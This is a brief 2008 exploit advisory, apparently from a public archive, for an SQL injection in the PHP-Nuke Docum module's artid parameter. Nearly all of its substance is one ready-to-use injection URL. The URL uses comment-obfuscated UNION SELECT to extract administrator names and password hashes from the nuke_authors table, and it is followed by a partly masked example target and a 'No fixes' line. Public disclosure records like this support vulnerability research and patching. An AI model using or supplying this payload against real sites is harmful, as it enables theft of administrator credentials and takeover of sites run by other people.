PHP-Nuke Module Docum (artid) SQL Injection Vulnerability

2008-02-20 00:00:00

#########################################################################

php-nuke modules Docum remote sql inj
#########################################################################

Found:DamaR

[email protected]

Hack Bitti ama Dönmek Yakın Since 2000
-------------------------------------------------------------------------------


/modules.php?name=Docum&op=viewarticle&artid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%20%20/**/0,1,aid,pwd,4/**/from/**/nuke_authors/*where%20admin%20-2

#########################################################################
Example: http://www.xxx.com.ar/mt/


#########################################################################

#

Fixes

No fixes

In order to submit a new fix you need to be registered.